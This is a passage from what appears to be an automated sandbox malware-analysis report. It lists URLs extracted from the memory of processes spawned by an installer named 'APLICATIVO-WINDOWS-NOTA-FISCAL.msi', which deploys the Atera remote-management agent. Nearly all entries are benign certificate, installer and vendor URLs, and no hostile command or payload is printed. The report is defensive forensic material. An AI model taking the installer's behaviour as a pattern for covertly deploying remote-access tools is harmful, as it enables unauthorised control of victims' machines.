                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/Packages(Id=
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807F3000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153801E4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153803ED000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153801E8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380773000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.000001538023D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153807E6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://community.chocolatey.org/api/v2/Search?searchTerm=
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
                                Source: powershell.exe, 0000001F.00000002.2147974616.0000022F64ECE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoFR
                                Source: rundll32.exe, 00000004.00000002.1704657212.00000000075F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsu
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B09B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630DD6000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2901951908.0000021649223000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, System.Threading.Tasks.dll.26.dr, Pubnub.dll0.1.dr, Atera.AgentPackages.CommonLib.dll2.26.dr, Microsoft.Extensions.Configuration.Abstractions.dll0.26.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2986692280.00000153FE7C4000.00000002.00000001.01000000.0000004C.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153805E8000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8022000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FF2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8045000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl)
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1762481931.00000177B82C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2389101650.0000021C5B8B0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DEE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 
0000000D.00000002.2297128226.0000021C42F44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B0BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FF2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl6
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2875938217.0000021648E1E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2898620667.00000216491D0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630716000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2904274317.0000021649239000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF001C7000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00241000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 
0000002A.00000002.2788069108.000002203A8D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D5000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B8022000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7FDA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2624626748.000002EF00241000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2130986157.000001F736C1E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000023.00000002.2086789811.000001F71CD2C000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000002.2245155748.0000014BCFF3E000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000003.2242282661.0000014BCFF0B000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 00000027.00000003.2243419604.0000014BCFF3E000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2865179818.0000022052F62000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2773209313.0000022039F7D000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002A.00000002.2788069108.000002203A8D5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 0000002F.00000002.2454916097.0000022B9AE50000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2981477200.00000153FE098000.00000004.00000020.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2976094132.00000153FD49F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2569441750.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2570707211.0000000002FB9000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 
0000003C.00000002.2790839667.0000029E3B677000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, System.Threading.Tasks.dll.26.dr, Pubnub.dll0.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crlL
00000037.00000002.2573114268.0000000004B51000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E22003000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.0000015380001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004075000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.0000000004821000.00000004.00000020.00020000.00000000.sdmp, APLICATIVO-WINDOWS-NOTA-FISCAL.msi, 692c50.msi.1.drString found in binary or memory: http://wixtoolset.org
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/news/
                                Source: rundll32.exe, 00000003.00000003.1660899653.0000000004990000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A44000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.000000000474F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004AD9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000036.00000003.2409510449.0000000004044000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000037.00000003.2425788970.00000000047F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/releases/
                                Source: AgentPackageMonitoring.exe, 00000023.00000002.2121016000.000001F735BF2000.00000002.00000001.01000000.00000021.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E21DAA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 0000003C.00000002.2695077269.0000029E222D9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.abit.com.tw/
                                Source: powershell.exe, 0000001F.00000002.2059219762.0000022F4CCAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                                Source: AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B438000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                                Source: AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A76000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42C01000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A83000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42B3B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DEE000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42F44000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.00000216309BF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630B22000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.000002163092E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630AF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS
                                Source: rundll32.exe, 00000003.00000003.1660899653.00000000049C1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1667017550.0000000004A75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1706214098.0000000004780000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1761585352.00000177B7F70000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1752871469.000001779DC7F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1762481931.00000177B82C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B903000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2392527211.0000021C5B928000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2381325869.0000021C5B4C7000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B467000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42A3A000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B420000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2389101650.0000021C5B8B0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2297128226.0000021C42DAB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B4A5000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2364577218.0000021C5B3EC000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B0BB000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 
0000000D.00000002.2297128226.0000021C42E47000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000010.00000003.1765646342.0000000004B0A000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2683966868.0000021630946000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: AteraAgent.exe, 0000000D.00000002.2384950146.0000021C5B583000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                                Source: AteraAgent.exe, 0000000D.00000002.2355746152.0000021C5B02B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                                Source: powershell.exe, 0000001F.00000002.2144248955.0000022F64DC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.miMSFTNetFirewallSetting.cmdletDefinition.cdxml
                                Source: powershell.exe, 0000001F.00000002.2149431073.0000022F64F39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                                Source: AgentPackageSTRemote.exe, 00000021.00000002.2691314024.000002EF74E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c5
                                Source: rundll32.exe, 00000004.00000002.1704657212.00000000075F0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                                Source: AteraAgent.exe, 0000001A.00000002.2683966868.00000216309FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nlog-project.org/schemas/NLog.xsd
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/technetwork/java/javase/jdk-relnotes-index-2162236.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/technetwork/java/javase/overview/index.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/technetwork/java/javase/terms/license/index.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.syntevo.com/smartgit/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.syntevo.com/smartgithg/license.html
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.syntevo.com/static/smart/download/smartgit/smartgit-win32-setup-jre-7_1_1.zip
                                Source: AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                                Source: AteraAgent.exe, 0000000C.00000002.1755843182.000001779F869000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.oh
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adoptium.net/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adoptopenjdk.net/
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adoptopenjdk.net/P
                                Source: AgentPackageProgramManagement.exe, 00000031.00000002.2835718988.00000153802D6000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000031.00000002.2960542903.000001539008E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adoptopenjdk.net/upstream.html.
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2327349674.00000281BE452000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.Pr
                                Source: rundll32.exe, 00000004.00000002.1702577102.0000000004CA4000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000037.00000002.2573114268.0000000004BF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterD
                                Source: rundll32.exe, 00000010.00000002.1807492407.0000000004D54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterDf
